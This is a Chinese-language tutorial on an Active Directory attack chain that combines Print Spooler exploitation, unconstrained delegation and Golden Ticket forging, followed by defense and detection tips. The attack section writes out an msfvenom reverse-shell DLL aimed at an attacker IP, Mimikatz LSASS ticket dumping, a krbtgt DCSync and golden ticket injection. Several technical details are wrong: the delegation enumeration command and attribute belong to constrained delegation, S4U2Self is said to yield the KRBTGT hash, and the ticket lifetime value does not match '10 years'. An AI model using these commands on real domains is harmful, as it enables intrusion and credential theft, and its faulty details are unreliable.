一、背景与原理概述

1.1 黄金票据攻击基础

黄金票据（Golden Ticket）是Kerberos认证体系中的一种高级攻击手段，通过伪造TGT（Ticket Granting Ticket）票据，攻击者可长期以任意用户身份访问域内资源。其核心在于利用KRBTGT账户的NTLM哈希值生成有效票据，而KRBTGT作为域内密钥分发中心（KDC）的核心账户，其哈希一旦泄露，将导致整个域环境沦陷。

1.2 非约束性委派的作用

非约束性委派（Unconstrained Delegation）是Active Directory中的一种信任配置，允许服务账户接收用户票据后，以该用户身份访问域内任意服务。若攻击者控制了配置非约束性委派的服务账户（如主机账户），即可捕获用户的TGT票据，为后续生成黄金票据提供关键数据。

1.3 Spooler服务的漏洞利用

Windows Spooler服务（打印后台处理程序）因设计缺陷，存在远程代码执行漏洞（如CVE-2021-34527）。攻击者可通过恶意打印机连接请求触发漏洞，在域内主机上执行任意代码，进而控制配置非约束性委派的服务账户，为黄金票据攻击铺路。

二、攻击步骤详解

2.1 前期信息收集

1. 域环境探测
   使用PowerView或BloodHound工具枚举域内主机、服务账户及委派配置，定位配置非约束性委派的服务账户（属性msDS-AllowedToDelegateTo为空）。

   Get-NetComputer -TrustedToAuth | Select-Object Name, OperatingSystem

2. Spooler服务状态检查
   通过Get-Service -Name Spooler确认目标主机是否启用Spooler服务，或扫描端口445（SMB）开放情况。

2.2 利用Spooler漏洞获取权限

1. 生成恶意打印机文件
   使用MSFvenom生成包含后门的DLL文件，通过打印机共享漏洞上传至目标主机。

   msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<攻击机IP> LPORT=<端口> -f dll > print.dll

2. 触发漏洞执行payload
   通过SMB协议将恶意DLL写入目标主机的C:\Windows\System32\spool\drivers\x64\3\目录，并利用RPC调用触发加载。

2.3 捕获TGT票据

1. 横向移动至非约束性委派账户
   控制目标主机后，使用Mimikatz导出本地缓存的票据或通过LSASS进程抓取内存中的TGT。

   Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

2. 利用非约束性委派转发请求
   若目标主机配置为非约束性委派，可通过S4U2Self扩展以任意用户身份请求服务票据（ST），进而获取KRBTGT的哈希值。

2.4 生成黄金票据

1. 提取KRBTGT哈希
   使用Mimikatz的lsadump::dcsync命令同步KRBTGT账户的NTLM哈希。

   Invoke-Mimikatz -Command '"lsadump::dcsync /domain:contoso.com /user:krbtgt"'

2. 伪造黄金票据
   根据提取的哈希值生成黄金票据，设置票据有效期（如10年）并注入当前会话。

   $kerberos_ticket = "kerberos::golden /user:Administrator /domain:contoso.com /sid:S-1-5-21-... /krbtgt:<NTLM哈希> /endin:604800 /ptt"
   Invoke-Mimikatz -Command $kerberos_ticket

三、防御与检测措施

3.1 限制非约束性委派

• 仅对必要服务账户配置约束性委派（Constrained Delegation）。
• 定期审计msDS-AllowedToDelegateTo属性，清理无效配置。

3.2 修复Spooler服务漏洞

• 禁用不必要的Spooler服务（Stop-Service -Name Spooler -Force）。
• 应用微软官方补丁（如KB5005565）。

3.3 监控与日志分析

• 部署SIEM工具实时检测异常Kerberos请求（如事件ID 4768、4769）。
• 监控LSASS进程访问行为，阻断内存抓取尝试。

四、实战案例与启示

4.1 案例复盘

某企业因未禁用Spooler服务且未限制委派权限，导致攻击者通过打印机漏洞控制域内主机，利用非约束性委派捕获域管TGT，最终生成黄金票据横向渗透至所有子域。

4.2 经验总结

• 最小权限原则：严格限制服务账户权限，避免滥用委派。
• 纵深防御：结合补丁管理、网络隔离和行为监控构建多层次防护。
• 红队演练：定期模拟攻击路径，验证防御体系有效性。

五、结语

本文通过解析非约束性委派与Spooler服务的联动攻击链，揭示了黄金票据攻击的现实威胁。安全人员需从权限管控、漏洞修复和威胁检测三方面构建主动防御机制，同时提升对Kerberos协议的深入理解，以应对日益复杂的APT攻击。